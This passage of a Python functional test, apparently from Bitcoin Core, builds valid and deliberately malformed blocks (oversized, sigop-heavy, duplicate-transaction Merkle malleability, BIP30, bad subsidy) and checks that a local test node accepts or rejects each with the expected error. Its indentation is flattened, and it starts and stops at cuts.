b24 = self.next_block(24, spend=out[6])
script_length = MAX_BLOCK_BASE_SIZE - len(b24.serialize()) - 69
script_output = CScript([b'\x00' * (script_length + 1)])
tx.vout = [CTxOut(0, script_output)]
b24 = self.update_block(24, [tx])
assert_equal(len(b24.serialize()), MAX_BLOCK_BASE_SIZE + 1)
self.sync_blocks([b24], False, 16, b'bad-blk-length', reconnect=True)
b25 = self.next_block(25, spend=out[7])
self.sync_blocks([b25], False)
# Create blocks with a coinbase input script size out of range
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7)
# \-> ... (6) -> ... (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with coinbase input script size out of range")
self.move_tip(15)
b26 = self.next_block(26, spend=out[6])
b26.vtx[0].vin[0].scriptSig = b'\x00'
b26.vtx[0].rehash()
# update_block causes the merkle root to get updated, even with no new
# transactions, and updates the required state.
b26 = self.update_block(26, [])
self.sync_blocks([b26], False, 16, b'bad-cb-length', reconnect=True)
# Extend the b26 chain to make sure bitcoind isn't accepting b26
b27 = self.next_block(27, spend=out[7])
self.sync_blocks([b27], False)
# Now try a too-large-coinbase script
self.move_tip(15)
b28 = self.next_block(28, spend=out[6])
b28.vtx[0].vin[0].scriptSig = b'\x00' * 101
b28.vtx[0].rehash()
b28 = self.update_block(28, [])
self.sync_blocks([b28], False, 16, b'bad-cb-length', reconnect=True)
# Extend the b28 chain to make sure bitcoind isn't accepting b28
b29 = self.next_block(29, spend=out[7])
self.sync_blocks([b29], False)
# b30 has a max-sized coinbase scriptSig.
self.move_tip(23)
b30 = self.next_block(30)
b30.vtx[0].vin[0].scriptSig = b'\x00' * 100
b30.vtx[0].rehash()
b30 = self.update_block(30, [])
self.sync_blocks([b30], True)
self.save_spendable_output()
# b31 - b35 - check sigops of OP_CHECKMULTISIG / OP_CHECKMULTISIGVERIFY / OP_CHECKSIGVERIFY
#
# genesis -> ... -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
# \-> b36 (11)
# \-> b34 (10)
# \-> b32 (9)
#
# MULTISIG: each op code counts as 20 sigops. To create the edge case, pack another 19 sigops at the end.
self.log.info("Accept a block with the max number of OP_CHECKMULTISIG sigops")
lots_of_multisigs = CScript([OP_CHECKMULTISIG] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
b31 = self.next_block(31, spend=out[8], script=lots_of_multisigs)
assert_equal(get_legacy_sigopcount_block(b31), MAX_BLOCK_SIGOPS)
self.sync_blocks([b31], True)
self.save_spendable_output()
# this goes over the limit because the coinbase has one sigop
self.log.info("Reject a block with too many OP_CHECKMULTISIG sigops")
too_many_multisigs = CScript([OP_CHECKMULTISIG] * (MAX_BLOCK_SIGOPS // 20))
b32 = self.next_block(32, spend=out[9], script=too_many_multisigs)
assert_equal(get_legacy_sigopcount_block(b32), MAX_BLOCK_SIGOPS + 1)
self.sync_blocks([b32], False, 16, b'bad-blk-sigops', reconnect=True)
# CHECKMULTISIGVERIFY
self.log.info("Accept a block with the max number of OP_CHECKMULTISIGVERIFY sigops")
self.move_tip(31)
lots_of_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
b33 = self.next_block(33, spend=out[9], script=lots_of_multisigs)
self.sync_blocks([b33], True)
self.save_spendable_output()
self.log.info("Reject a block with too many OP_CHECKMULTISIGVERIFY sigops")
too_many_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * (MAX_BLOCK_SIGOPS // 20))
b34 = self.next_block(34, spend=out[10], script=too_many_multisigs)
self.sync_blocks([b34], False, 16, b'bad-blk-sigops', reconnect=True)
# CHECKSIGVERIFY
self.log.info("Accept a block with the max number of OP_CHECKSIGVERIFY sigops")
self.move_tip(33)
lots_of_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS - 1))
b35 = self.next_block(35, spend=out[10], script=lots_of_checksigs)
self.sync_blocks([b35], True)
self.save_spendable_output()
self.log.info("Reject a block with too many OP_CHECKSIGVERIFY sigops")
too_many_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS))
b36 = self.next_block(36, spend=out[11], script=too_many_checksigs)
self.sync_blocks([b36], False, 16, b'bad-blk-sigops', reconnect=True)
# Check spending of a transaction in a block which failed to connect
#
# b6 (3)
# b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
# \-> b37 (11)
# \-> b38 (11/37)
#
# save 37's spendable output, but then double-spend out11 to invalidate the block
self.log.info("Reject a block spending transaction from a block which failed to connect")
self.move_tip(35)
b37 = self.next_block(37, spend=out[11])
txout_b37 = b37.vtx[1]
tx = self.create_and_sign_transaction(out[11], 0)
b37 = self.update_block(37, [tx])
self.sync_blocks([b37], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# attempt to spend b37's first non-coinbase tx, at which point b37 was still considered valid
self.move_tip(35)
b38 = self.next_block(38, spend=txout_b37)
self.sync_blocks([b38], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Check P2SH SigOp counting
#
#
# 13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b41 (12)
# \-> b40 (12)
#
# b39 - create some P2SH outputs that will require 6 sigops to spend:
#
# redeem_script = COINBASE_PUBKEY, (OP_2DUP+OP_CHECKSIGVERIFY) * 5, OP_CHECKSIG
# p2sh_script = OP_HASH160, ripemd160(sha256(script)), OP_EQUAL
#
self.log.info("Check P2SH SIGOPS are correctly counted")
self.move_tip(35)
b39 = self.next_block(39)
b39_outputs = 0
b39_sigops_per_output = 6
# Build the redeem script, hash it, use hash to create the p2sh script
redeem_script = CScript([self.coinbase_pubkey] + [OP_2DUP, OP_CHECKSIGVERIFY] * 5 + [OP_CHECKSIG])
redeem_script_hash = hash160(redeem_script)
p2sh_script = CScript([OP_HASH160, redeem_script_hash, OP_EQUAL])
# Create a transaction that spends one satoshi to the p2sh_script, the rest to OP_TRUE
# This must be signed because it is spending a coinbase
spend = out[11]
tx = self.create_tx(spend, 0, 1, p2sh_script)
tx.vout.append(CTxOut(spend.vout[0].nValue - 1, CScript([OP_TRUE])))
self.sign_tx(tx, spend)
tx.rehash()
b39 = self.update_block(39, [tx])
b39_outputs += 1
# Until block is full, add tx's with 1 satoshi to p2sh_script, the rest to OP_TRUE
tx_new = None
tx_last = tx
total_size = len(b39.serialize())
while(total_size < MAX_BLOCK_BASE_SIZE):
tx_new = self.create_tx(tx_last, 1, 1, p2sh_script)
tx_new.vout.append(CTxOut(tx_last.vout[1].nValue - 1, CScript([OP_TRUE])))
tx_new.rehash()
total_size += len(tx_new.serialize())
if total_size >= MAX_BLOCK_BASE_SIZE:
break
b39.vtx.append(tx_new) # add tx to block
tx_last = tx_new
b39_outputs += 1
b39 = self.update_block(39, [])
self.sync_blocks([b39], True)
self.save_spendable_output()
# Test sigops in P2SH redeem scripts
#
# b40 creates 3333 tx's spending the 6-sigop P2SH outputs from b39 for a total of 19998 sigops.
# The first tx has one sigop and then at the end we add 2 more to put us just over the max.
#
# b41 does the same, less one, so it has the maximum sigops permitted.
#
self.log.info("Reject a block with too many P2SH sigops")
self.move_tip(39)
b40 = self.next_block(40, spend=out[12])
sigops = get_legacy_sigopcount_block(b40)
numTxes = (MAX_BLOCK_SIGOPS - sigops) // b39_sigops_per_output
assert_equal(numTxes <= b39_outputs, True)
lastOutpoint = COutPoint(b40.vtx[1].sha256, 0)
new_txs = []
for i in range(1, numTxes + 1):
tx = CTransaction()
tx.vout.append(CTxOut(1, CScript([OP_TRUE])))
tx.vin.append(CTxIn(lastOutpoint, b''))
# second input is corresponding P2SH output from b39
tx.vin.append(CTxIn(COutPoint(b39.vtx[i].sha256, 0), b''))
# Note: must pass the redeem_script (not p2sh_script) to the signature hash function
(sighash, err) = SignatureHash(redeem_script, tx, 1, SIGHASH_ALL)
sig = self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))
scriptSig = CScript([sig, redeem_script])
tx.vin[1].scriptSig = scriptSig
tx.rehash()
new_txs.append(tx)
lastOutpoint = COutPoint(tx.sha256, 0)
b40_sigops_to_fill = MAX_BLOCK_SIGOPS - (numTxes * b39_sigops_per_output + sigops) + 1
tx = CTransaction()
tx.vin.append(CTxIn(lastOutpoint, b''))
tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b40_sigops_to_fill)))
tx.rehash()
new_txs.append(tx)
self.update_block(40, new_txs)
self.sync_blocks([b40], False, 16, b'bad-blk-sigops', reconnect=True)
# same as b40, but one less sigop
self.log.info("Accept a block with the max number of P2SH sigops")
self.move_tip(39)
b41 = self.next_block(41, spend=None)
self.update_block(41, b40.vtx[1:-1])
b41_sigops_to_fill = b40_sigops_to_fill - 1
tx = CTransaction()
tx.vin.append(CTxIn(lastOutpoint, b''))
tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b41_sigops_to_fill)))
tx.rehash()
self.update_block(41, [tx])
self.sync_blocks([b41], True)
# Fork off of b39 to create a constant base again
#
# b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13)
# \-> b41 (12)
#
self.move_tip(39)
b42 = self.next_block(42, spend=out[12])
self.save_spendable_output()
b43 = self.next_block(43, spend=out[13])
self.save_spendable_output()
self.sync_blocks([b42, b43], True)
# Test a number of really invalid scenarios
#
# -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b44 (14)
# \-> ??? (15)
# The next few blocks are going to be created "by hand" since they'll do funky things, such as having
# the first transaction be non-coinbase, etc. The purpose of b44 is to make sure this works.
self.log.info("Build block 44 manually")
height = self.block_heights[self.tip.sha256] + 1
coinbase = create_coinbase(height, self.coinbase_pubkey)
b44 = CBlock()
b44.nTime = self.tip.nTime + 1
b44.hashPrevBlock = self.tip.sha256
b44.nBits = 0x207fffff
b44.vtx.append(coinbase)
b44.hashMerkleRoot = b44.calc_merkle_root()
b44.solve()
self.tip = b44
self.block_heights[b44.sha256] = height
self.blocks[44] = b44
self.sync_blocks([b44], True)
self.log.info("Reject a block with a non-coinbase as the first tx")
non_coinbase = self.create_tx(out[15], 0, 1)
b45 = CBlock()
b45.nTime = self.tip.nTime + 1
b45.hashPrevBlock = self.tip.sha256
b45.nBits = 0x207fffff
b45.vtx.append(non_coinbase)
b45.hashMerkleRoot = b45.calc_merkle_root()
b45.calc_sha256()
b45.solve()
self.block_heights[b45.sha256] = self.block_heights[self.tip.sha256] + 1
self.tip = b45
self.blocks[45] = b45
self.sync_blocks([b45], False, 16, b'bad-cb-missing', reconnect=True)
self.log.info("Reject a block with no transactions")
self.move_tip(44)
b46 = CBlock()
b46.nTime = b44.nTime + 1
b46.hashPrevBlock = b44.sha256
b46.nBits = 0x207fffff
b46.vtx = []
b46.hashMerkleRoot = 0
b46.solve()
self.block_heights[b46.sha256] = self.block_heights[b44.sha256] + 1
self.tip = b46
assert 46 not in self.blocks
self.blocks[46] = b46
self.sync_blocks([b46], False, 16, b'bad-blk-length', reconnect=True)
self.log.info("Reject a block with invalid work")
self.move_tip(44)
b47 = self.next_block(47, solve=False)
target = uint256_from_compact(b47.nBits)
while b47.sha256 < target:
b47.nNonce += 1
b47.rehash()
self.sync_blocks([b47], False, request_block=False)
self.log.info("Reject a block with a timestamp >2 hours in the future")
self.move_tip(44)
b48 = self.next_block(48, solve=False)
b48.nTime = int(time.time()) + 60 * 60 * 3
b48.solve()
self.sync_blocks([b48], False, request_block=False)
self.log.info("Reject a block with invalid merkle hash")
self.move_tip(44)
b49 = self.next_block(49)
b49.hashMerkleRoot += 1
b49.solve()
self.sync_blocks([b49], False, 16, b'bad-txnmrklroot', reconnect=True)
self.log.info("Reject a block with incorrect POW limit")
self.move_tip(44)
b50 = self.next_block(50)
b50.nBits = b50.nBits - 1
b50.solve()
self.sync_blocks([b50], False, request_block=False, reconnect=True)
self.log.info("Reject a block with two coinbase transactions")
self.move_tip(44)
b51 = self.next_block(51)
cb2 = create_coinbase(51, self.coinbase_pubkey)
b51 = self.update_block(51, [cb2])
self.sync_blocks([b51], False, 16, b'bad-cb-multiple', reconnect=True)
self.log.info("Reject a block with duplicate transactions")
# Note: txns have to be in the right position in the merkle tree to trigger this error
self.move_tip(44)
b52 = self.next_block(52, spend=out[15])
tx = self.create_tx(b52.vtx[1], 0, 1)
b52 = self.update_block(52, [tx, tx])
self.sync_blocks([b52], False, 16, b'bad-txns-duplicate', reconnect=True)
# Test block timestamps
# -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15)
# \-> b54 (15)
#
self.move_tip(43)
b53 = self.next_block(53, spend=out[14])
self.sync_blocks([b53], False)
self.save_spendable_output()
self.log.info("Reject a block with timestamp before MedianTimePast")
b54 = self.next_block(54, spend=out[15])
b54.nTime = b35.nTime - 1
b54.solve()
self.sync_blocks([b54], False, request_block=False)
# valid timestamp
self.move_tip(53)
b55 = self.next_block(55, spend=out[15])
b55.nTime = b35.nTime
self.update_block(55, [])
self.sync_blocks([b55], True)
self.save_spendable_output()
# Test Merkle tree malleability
#
# -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57p2 (16)
# \-> b57 (16)
# \-> b56p2 (16)
# \-> b56 (16)
#
# Merkle tree malleability (CVE-2012-2459): repeating sequences of transactions in a block without
# affecting the merkle root of a block, while still invalidating it.
# See: src/consensus/merkle.h
#
# b57 has three txns: coinbase, tx, tx1. The merkle root computation will duplicate tx.
# Result: OK
#
# b56 copies b57 but duplicates tx1 and does not recalculate the block hash. So it has a valid merkle
# root but duplicate transactions.
# Result: Fails
#
# b57p2 has six transactions in its merkle tree:
# - coinbase, tx, tx1, tx2, tx3, tx4
# Merkle root calculation will duplicate as necessary.
# Result: OK.
#
# b56p2 copies b57p2 but adds both tx3 and tx4. The purpose of the test is to make sure the code catches
# duplicate txns that are not next to one another with the "bad-txns-duplicate" error (which indicates
# that the error was caught early, avoiding a DOS vulnerability.)
# b57 - a good block with 2 txs, don't submit until end
self.move_tip(55)
b57 = self.next_block(57)
tx = self.create_and_sign_transaction(out[16], 1)
tx1 = self.create_tx(tx, 0, 1)
b57 = self.update_block(57, [tx, tx1])
# b56 - copy b57, add a duplicate tx
self.log.info("Reject a block with a duplicate transaction in the Merkle Tree (but with a valid Merkle Root)")
self.move_tip(55)
b56 = copy.deepcopy(b57)
self.blocks[56] = b56
assert_equal(len(b56.vtx), 3)
b56 = self.update_block(56, [tx1])
assert_equal(b56.hash, b57.hash)
self.sync_blocks([b56], False, 16, b'bad-txns-duplicate', reconnect=True)
# b57p2 - a good block with 6 tx'es, don't submit until end
self.move_tip(55)
b57p2 = self.next_block("57p2")
tx = self.create_and_sign_transaction(out[16], 1)
tx1 = self.create_tx(tx, 0, 1)
tx2 = self.create_tx(tx1, 0, 1)
tx3 = self.create_tx(tx2, 0, 1)
tx4 = self.create_tx(tx3, 0, 1)
b57p2 = self.update_block("57p2", [tx, tx1, tx2, tx3, tx4])
# b56p2 - copy b57p2, duplicate two non-consecutive tx's
self.log.info("Reject a block with two duplicate transactions in the Merkle Tree (but with a valid Merkle Root)")
self.move_tip(55)
b56p2 = copy.deepcopy(b57p2)
self.blocks["b56p2"] = b56p2
assert_equal(b56p2.hash, b57p2.hash)
assert_equal(len(b56p2.vtx), 6)
b56p2 = self.update_block("b56p2", [tx3, tx4])
self.sync_blocks([b56p2], False, 16, b'bad-txns-duplicate', reconnect=True)
self.move_tip("57p2")
self.sync_blocks([b57p2], True)
self.move_tip(57)
self.sync_blocks([b57], False) # The tip is not updated because 57p2 seen first
self.save_spendable_output()
# Test a few invalid tx types
#
# -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> ??? (17)
#
# tx with prevout.n out of range
self.log.info("Reject a block with a transaction with prevout.n out of range")
self.move_tip(57)
b58 = self.next_block(58, spend=out[17])
tx = CTransaction()
assert(len(out[17].vout) < 42)
tx.vin.append(CTxIn(COutPoint(out[17].sha256, 42), CScript([OP_TRUE]), 0xffffffff))
tx.vout.append(CTxOut(0, b""))
tx.calc_sha256()
b58 = self.update_block(58, [tx])
self.sync_blocks([b58], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# tx with output value > input value
self.log.info("Reject a block with a transaction with outputs > inputs")
self.move_tip(57)
b59 = self.next_block(59)
tx = self.create_and_sign_transaction(out[17], 51 * COIN)
b59 = self.update_block(59, [tx])
self.sync_blocks([b59], False, 16, b'bad-txns-in-belowout', reconnect=True)
# reset to good chain
self.move_tip(57)
b60 = self.next_block(60, spend=out[17])
self.sync_blocks([b60], True)
self.save_spendable_output()
# Test BIP30
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b61 (18)
#
# Blocks are not allowed to contain a transaction whose id matches that of an earlier,
# not-fully-spent transaction in the same chain. To test, make identical coinbases;
# the second one should be rejected.
#
self.log.info("Reject a block with a transaction with a duplicate hash of a previous transaction (BIP30)")
self.move_tip(60)
b61 = self.next_block(61, spend=out[18])
b61.vtx[0].vin[0].scriptSig = b60.vtx[0].vin[0].scriptSig # Equalize the coinbases
b61.vtx[0].rehash()
b61 = self.update_block(61, [])
assert_equal(b60.vtx[0].serialize(), b61.vtx[0].serialize())
self.sync_blocks([b61], False, 16, b'bad-txns-BIP30', reconnect=True)
# Test tx.isFinal is properly rejected (not an exhaustive tx.isFinal test, that should be in data-driven transaction tests)
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b62 (18)
#
self.log.info("Reject a block with a transaction with a nonfinal locktime")
self.move_tip(60)
b62 = self.next_block(62)
tx = CTransaction()
tx.nLockTime = 0xffffffff # this locktime is non-final
tx.vin.append(CTxIn(COutPoint(out[18].sha256, 0))) # don't set nSequence
tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
assert(tx.vin[0].nSequence < 0xffffffff)
tx.calc_sha256()
b62 = self.update_block(62, [tx])
self.sync_blocks([b62], False, 16, b'bad-txns-nonfinal')
# Test a non-final coinbase is also rejected
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b63 (-)
#
self.log.info("Reject a block with a coinbase transaction with a nonfinal locktime")
self.move_tip(60)
b63 = self.next_block(63)
b63.vtx[0].nLockTime = 0xffffffff
b63.vtx[0].vin[0].nSequence = 0xDEADBEEF
b63.vtx[0].rehash()
b63 = self.update_block(63, [])
self.sync_blocks([b63], False, 16, b'bad-txns-nonfinal')
# This checks that a block with a bloated VARINT between the block_header and the array of tx such that
# the block is > MAX_BLOCK_BASE_SIZE with the bloated varint, but <= MAX_BLOCK_BASE_SIZE without the bloated varint,
# does not cause a subsequent, identical block with canonical encoding to be rejected. The test does not
# care whether the bloated block is accepted or rejected; it only cares that the second block is accepted.
#
# What matters is that the receiving node should not reject the bloated block, and then reject the canonical
# block on the basis that it's the same as an already-rejected block (which would be a consensus failure.)
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18)
# \
# b64a (18)
# b64a is a bloated block (non-canonical varint)
# b64 is a good block (same as b64 but w/ canonical varint)
#
self.log.info("Accept a valid block even if a bloated version of the block has previously been sent")
self.move_tip(60)
regular_block = self.next_block("64a", spend=out[18])
# make it a "broken_block," with non-canonical serialization
b64a = CBrokenBlock(regular_block)
b64a.initialize(regular_block)
self.blocks["64a"] = b64a
self.tip = b64a
tx = CTransaction()
# use canonical serialization to calculate size
script_length = MAX_BLOCK_BASE_SIZE - len(b64a.normal_serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b64a.vtx[1].sha256, 0)))
b64a = self.update_block("64a", [tx])
assert_equal(len(b64a.serialize()), MAX_BLOCK_BASE_SIZE + 8)
self.sync_blocks([b64a], False, 1, b'error parsing message')
# bitcoind doesn't disconnect us for sending a bloated block, but if we subsequently
# resend the header message, it won't send us the getdata message again. Just
# disconnect and reconnect and then call sync_blocks.
# TODO: improve this test to be less dependent on P2P DOS behaviour.
node.disconnect_p2ps()
self.reconnect_p2p()
self.move_tip(60)
b64 = CBlock(b64a)
b64.vtx = copy.deepcopy(b64a.vtx)
assert_equal(b64.hash, b64a.hash)
assert_equal(len(b64.serialize()), MAX_BLOCK_BASE_SIZE)
self.blocks[64] = b64
b64 = self.update_block(64, [])
self.sync_blocks([b64], True)
self.save_spendable_output()
# Spend an output created in the block itself
#
# -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
#
self.log.info("Accept a block with a transaction spending an output created in the same block")
self.move_tip(64)
b65 = self.next_block(65)
tx1 = self.create_and_sign_transaction(out[19], out[19].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 0)
b65 = self.update_block(65, [tx1, tx2])
self.sync_blocks([b65], True)
self.save_spendable_output()
# Attempt to spend an output created later in the same block
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
# \-> b66 (20)
self.log.info("Reject a block with a transaction spending an output created later in the same block")
self.move_tip(65)
b66 = self.next_block(66)
tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 1)
b66 = self.update_block(66, [tx2, tx1])
self.sync_blocks([b66], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to double-spend a transaction created in a block
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
# \-> b67 (20)
#
#
self.log.info("Reject a block with a transaction double spending a transaction creted in the same block")
self.move_tip(65)
b67 = self.next_block(67)
tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 1)
tx3 = self.create_and_sign_transaction(tx1, 2)
b67 = self.update_block(67, [tx1, tx2, tx3])
self.sync_blocks([b67], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# More tests of block subsidy
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
# \-> b68 (20)
#
# b68 - coinbase with an extra 10 satoshis,
# creates a tx that has 9 satoshis from out[20] go to fees
# this fails because the coinbase is trying to claim 1 satoshi too much in fees
#
# b69 - coinbase with extra 10 satoshis, and a tx that gives a 10 satoshi fee
# this succeeds
#
self.log.info("Reject a block trying to claim too much subsidy in the coinbase transaction")
self.move_tip(65)
b68 = self.next_block(68, additional_coinbase_value=10)
tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 9)
b68 = self.update_block(68, [tx])
self.sync_blocks([b68], False, 16, b'bad-cb-amount', reconnect=True)
self.log.info("Accept a block claiming the correct subsidy in the coinbase transaction")
self.move_tip(65)
b69 = self.next_block(69, additional_coinbase_value=10)
tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 10)
self.update_block(69, [tx])
self.sync_blocks([b69], True)
self.save_spendable_output()
# Test spending the outpoint of a non-existent transaction
#
# -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
# \-> b70 (21)
#
self.log.info("Reject a block containing a transaction spending from a non-existent input")
self.move_tip(69)
b70 = self.next_block(70, spend=out[21])
bogus_tx = CTransaction()
bogus_tx.sha256 = uint256_from_str(b"23c70ed7c0506e9178fc1a987f40a33946d4ad4c962b5ae3a52546da53af0c5c")
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(bogus_tx.sha256, 0), b"", 0xffffffff))
tx.vout.append(CTxOut(1, b""))
b70 = self.update_block(70, [tx])
self.sync_blocks([b70], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Test accepting an invalid block which has the same hash as a valid one (via merkle tree tricks)
#
# -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
# \-> b71 (21)
#
# b72 is a good block.
# b71 is a copy of 72, but re-adds one of its transactions. However, it has the same hash as b72.
self.log.info("Reject a block containing a duplicate transaction but with the same Merkle root (Merkle tree malleability")
self.move_tip(69)
b72 = self.next_block(72)
tx1 = self.create_and_sign_transaction(out[21], 2)
tx2 = self.create_and_sign_transaction(tx1, 1)
b72 = self.update_block(72, [tx1, tx2]) # now tip is 72
b71 = copy.deepcopy(b72)
b71.vtx.append(tx2) # add duplicate tx2
self.block_heights[b71.sha256] = self.block_heights[b69.sha256] + 1 # b71 builds off b69
self.blocks[71] = b71
assert_equal(len(b71.vtx), 4)
assert_equal(len(b72.vtx), 3)
assert_equal(b72.sha256, b71.sha256)
self.move_tip(71)
self.sync_blocks([b71], False, 16, b'bad-txns-duplicate', reconnect=True)
self.move_tip(72)
self.sync_blocks([b72], True)
self.save_spendable_output()
# Test some invalid scripts and MAX_BLOCK_SIGOPS
#
# -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
# \-> b** (22)
#
# b73 - tx with excessive sigops that are placed after an excessively large script element.
# The purpose of the test is to make sure those sigops are counted.
#
# script is a bytearray of size 20,526
#
# bytearray[0-19,998] : OP_CHECKSIG
# bytearray[19,999] : OP_PUSHDATA4
# bytearray[20,000-20,003]: 521 (max_script_element_size+1, in little-endian format)
# bytearray[20,004-20,525]: unread data (script_element)
# bytearray[20,526] : OP_CHECKSIG (this puts us over the limit)
self.log.info("Reject a block containing too many sigops after a large script element")
self.move_tip(72)
b73 = self.next_block(73)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5 + 1
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = int("4e", 16) # OP_PUSHDATA4
element_size = MAX_SCRIPT_ELEMENT_SIZE + 1
a[MAX_BLOCK_SIGOPS] = element_size % 256
a[MAX_BLOCK_SIGOPS + 1] = element_size // 256
a[MAX_BLOCK_SIGOPS + 2] = 0
a[MAX_BLOCK_SIGOPS + 3] = 0
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b73 = self.update_block(73, [tx])
assert_equal(get_legacy_sigopcount_block(b73), MAX_BLOCK_SIGOPS + 1)
self.sync_blocks([b73], False, 16, b'bad-blk-sigops', reconnect=True)
# b74/75 - if we push an invalid script element, all prevous sigops are counted,
# but sigops after the element are not counted.
#
# The invalid script element is that the push_data indicates that
# there will be a large amount of data (0xffffff bytes), but we only
# provide a much smaller number. These bytes are CHECKSIGS so they would
# cause b75 to fail for excessive sigops, if those bytes were counted.
#
# b74 fails because we put MAX_BLOCK_SIGOPS+1 before the element
# b75 succeeds because we put MAX_BLOCK_SIGOPS before the element
self.log.info("Check sigops are counted correctly after an invalid script element")
self.move_tip(72)
b74 = self.next_block(74)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42 # total = 20,561
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS] = 0x4e
a[MAX_BLOCK_SIGOPS + 1] = 0xfe
a[MAX_BLOCK_SIGOPS + 2] = 0xff
a[MAX_BLOCK_SIGOPS + 3] = 0xff
a[MAX_BLOCK_SIGOPS + 4] = 0xff
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b74 = self.update_block(74, [tx])
self.sync_blocks([b74], False, 16, b'bad-blk-sigops', reconnect=True)
self.move_tip(72)
b75 = self.next_block(75)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = 0x4e
a[MAX_BLOCK_SIGOPS] = 0xff
a[MAX_BLOCK_SIGOPS + 1] = 0xff
a[MAX_BLOCK_SIGOPS + 2] = 0xff
a[MAX_BLOCK_SIGOPS + 3] = 0xff
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b75 = self.update_block(75, [tx])
self.sync_blocks([b75], True)
self.save_spendable_output()
# Check that if we push an element filled with CHECKSIGs, they are not counted
self.move_tip(75)
b76 = self.next_block(76)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = 0x4e # PUSHDATA4, but leave the following bytes as just checksigs
tx = self.create_and_sign_transaction(out[23], 1, CScript(a))
b76 = self.update_block(76, [tx])
self.sync_blocks([b76], True)
self.save_spendable_output()
# Test transaction resurrection
#
# -> b77 (24) -> b78 (25) -> b79 (26)
# \-> b80 (25) -> b81 (26) -> b82 (27)
#
# b78 creates a tx, which is spent in b79. After b82, both should be in mempool
#
# The tx'es must be unsigned and pass the node's mempool policy. It is unsigned for the
# rather obscure reason that the Python signature code does not distinguish between
# Low-S and High-S values (whereas the bitcoin code has custom code which does so);
# as a result of which, the odds are 50% that the python code will use the right
# value and the transaction will be accepted into the mempool. Until we modify the
# test framework to support low-S signing, we are out of luck.
#
# To get around this issue, we construct transactions which are not signed and which
# spend to OP_TRUE. If the standard-ness rules change, this test would need to be
